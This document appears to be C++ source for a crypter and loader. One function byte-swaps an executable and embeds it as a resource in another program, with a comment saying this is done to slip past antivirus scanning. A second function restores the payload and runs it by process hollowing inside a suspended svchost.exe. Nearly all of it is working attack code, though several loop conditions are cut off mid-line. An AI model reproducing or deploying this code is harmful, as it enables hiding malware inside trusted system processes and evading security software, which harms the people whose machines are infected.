01 //修改过的可执行程序以资源的形式添加到另外一个正常的可执行程序中
02 BOOL Deformation(CString strRstFile,CString strDstFile)
03 {
04 CFile file;
05 BYTE *rstdata;
06 DWORD dwLen;
07 HANDLE hUpdateRes;
08 BOOL result;
09 LPBYTE p;
10 //把要当成资源的文件读入内存
11 file.Open(strRstFile, CFile::modeRead);
12 dwLen=file.GetLength();
13 rstdata=new BYTE[dwLen];
14 file.ReadHuge(rstdata, dwLen);
15 file.Close();
16
17 // 为数据分配空间
18 p = (LPBYTE)GlobalAlloc(GPTR, dwLen);
19 if (p == NULL)
20 {
21 MessageBox("分配内存失败!", "错误", MB_OK|MB_ICONINFORMATION);
22 return 0;
23 }
24 // 复制资源数据
25 CopyMemory((LPVOID)p, (LPCVOID)rstdata, dwLen);
26 //这里我把前后两位的值颠倒,使其可以通过杀软的查杀
27 for (DWORD i=0; i
28 {
29 if (i%2 ==0)
30 {
31 CopyMemory((LPVOID)(p + i), (LPCVOID)(rstdata + i + 1), 1);
32 CopyMemory((LPVOID)(p + i + 1), (LPCVOID)(rstdata + i), 1);
33 }
34 i++;
35 }
36
37 //将资源写入目标exe文件
38 hUpdateRes=BeginUpdateResource(strDstFile, FALSE);
39 result=UpdateResource(hUpdateRes, _T("PI"), MAKEINTRESOURCE(1001), MAKELANGID(LANG_NEUTRAL, SUBLANG_SYS_DEFAULT), (LPVOID)p, dwLen);
40 result=EndUpdateResource(hUpdateRes, FALSE); //必须是FALSE,否则不更新
41 return result;
42 }
//将修改过的可执行程序读入内存,并恢复原状,然后加以运行。
001 bool OnBuild()
002 {
003 // TODO: Add your control notification handler code here
004 HRSRC hResInfo;
005 HGLOBAL hResData;
006 DWORD dwSize;
007 LPBYTE p;
008 LPBYTE q;
009
010 // 查找所需的资源
011 hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_PI1), "pi");
012 if (hResInfo == NULL)
013 {
014 MessageBox("查找资源失败!", "错误", MB_OK|MB_ICONINFORMATION);
015 return 0;
016 }
017 // 获得资源尺寸
018 dwSize = SizeofResource(NULL, hResInfo);
019 // 装载资源
020 hResData = LoadResource(NULL, hResInfo);
021 if (hResData == NULL)
022 {
023 MessageBox("装载资源失败!", "错误", MB_OK|MB_ICONINFORMATION);
024 return 0;
025 }
026 // 为数据分配空间
027 p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
028 if (p == NULL)
029 {
030 MessageBox("p分配内存失败!", "错误", MB_OK|MB_ICONINFORMATION);
031 return 0;
032 }
033
034 q = (LPBYTE)GlobalAlloc(GPTR, dwSize);
035 if (q == NULL)
036 {
037 MessageBox("q分配内存失败!", "错误", MB_OK|MB_ICONINFORMATION);
038 return 0;
039 }
040 // 复制资源数据
041 ::CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
042 ::CopyMemory((LPVOID)q, (LPCVOID)LockResource(hResData), dwSize);
043 // 这里把可执行程序修复正确
044 for (DWORD i=0; i
045 {
046 if (i%2 ==0)
047 {
048 ::CopyMemory((LPVOID)(p + i), (LPVOID)(q + i + 1), 1);
049 ::CopyMemory((LPVOID)(p + i + 1), (LPVOID)(q + i), 1);
050 }
051 i++;
052 }
053
054 IMAGE_DOS_HEADER DosHeader;
055 IMAGE_NT_HEADERS NtHeader;
056
057 PROCESS_INFORMATION pi;
058 STARTUPINFO si;
059 CONTEXT context;
060 PVOID ImageBase;
061 unsigned long BaseAddr;
062 unsigned long retByte = 0;
063 LONG offset;
064
065 HMODULE hNtDll=GetModuleHandle("ntdll.dll");
066 if(!hNtDll)
067 return FALSE;
068 ZWUNMAPVIEWOFSECTION ZwUnmapViewOfSection = (ZWUNMAPVIEWOFSECTION)GetProcAddress(hNtDll,"ZwUnmapViewOfSection");
069
070 memset(&si, 0, sizeof(si));
071 memset(&pi, 0, sizeof(pi));
072 si.cb = sizeof(si);
073
074 ::CopyMemory((void *)&DosHeader,p,sizeof(IMAGE_DOS_HEADER));
075 ::CopyMemory((void *)&NtHeader,&p[DosHeader.e_lfanew],sizeof(IMAGE_NT_HEADERS));
076
077 //以挂起方式创建进程
078 BOOL res = CreateProcess(NULL,"C://windows//system32//svchost.exe",NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi);
079
080 if (res)
081 {
082 context.ContextFlags = CONTEXT_FULL;
083 if (!GetThreadContext(pi.hThread,&context)) //如果调用失败
084 {
085 CloseHandle(pi.hThread);
086 CloseHandle(pi.hProcess);
087 return FALSE;
088 }
089 ReadProcessMemory(pi.hProcess,(void *)(context.Ebx + 8),&BaseAddr,sizeof(unsigned long),NULL);
090 if (!BaseAddr)
091 {
092 CloseHandle(pi.hThread);
093 CloseHandle(pi.hProcess);
094 return FALSE;
095 }
096 //拆卸傀儡进程内存模块
097 if (ZwUnmapViewOfSection((unsigned long)pi.hProcess,BaseAddr))
098 {
099 CloseHandle(pi.hThread);
100 CloseHandle(pi.hProcess);
101 return FALSE;
102 }
103 ImageBase = VirtualAllocEx(pi.hProcess,
104 (void *)NtHeader.OptionalHeader.ImageBase,
105 NtHeader.OptionalHeader.SizeOfImage,
106 MEM_RESERVE|MEM_COMMIT,
107 PAGE_EXECUTE_READWRITE); //ImageBase 0x00400000
108 if (ImageBase == NULL)
109 {
110 DWORD wrongFlag = GetLastError();
111 CloseHandle(pi.hThread);
112 CloseHandle(pi.hProcess);
113 return FALSE;
114 }
115 //替换傀儡进程内存数据
116 if(!WriteProcessMemory(pi.hProcess, ImageBase, p, NtHeader.OptionalHeader.SizeOfHeaders, &retByte))
117 {
118 DWORD wrongFlag2 = GetLastError();
119 }
120 //DOS 头 + PE 头 + 区块表的总大小
121 //定位到区块头
122 offset = DosHeader.e_lfanew + sizeof(IMAGE_NT_HEADERS);
123 IMAGE_SECTION_HEADER secHeader;
124 WORD i = 0;
125 for (;i < NtHeader.FileHeader.NumberOfSections;i++)
126 {
127 //定位到各个区块
128 ::CopyMemory((void *)&secHeader, &p[offset + i*sizeof(IMAGE_SECTION_HEADER)],sizeof(IMAGE_SECTION_HEADER));
129 WriteProcessMemory(pi.hProcess,(LPVOID)((DWORD)ImageBase + secHeader.VirtualAddress),&p[secHeader.PointerToRawData],secHeader.SizeOfRawData,&retByte);
130 VirtualProtectEx(pi.hProcess, (LPVOID)((DWORD)ImageBase + secHeader.VirtualAddress), secHeader.Misc.VirtualSize, PAGE_EXECUTE_READWRITE,&BaseAddr);
131 }
132
133 context.ContextFlags = CONTEXT_FULL;
134 //重置 执行文件入口
135 WriteProcessMemory(pi.hProcess, (void *)(context.Ebx + 8),
136 &ImageBase, //4194304
137 4, &retByte);
138 context.Eax = (unsigned long)ImageBase + NtHeader.OptionalHeader.AddressOfEntryPoint;
139 SetThreadContext(pi.hThread,&context);
140 ResumeThread(pi.hThread);
141 }
142
143 CloseHandle(pi.hThread);
144 CloseHandle(pi.hProcess);
145
146 GlobalFree((HGLOBAL)p);
147
148 return 0;
149 }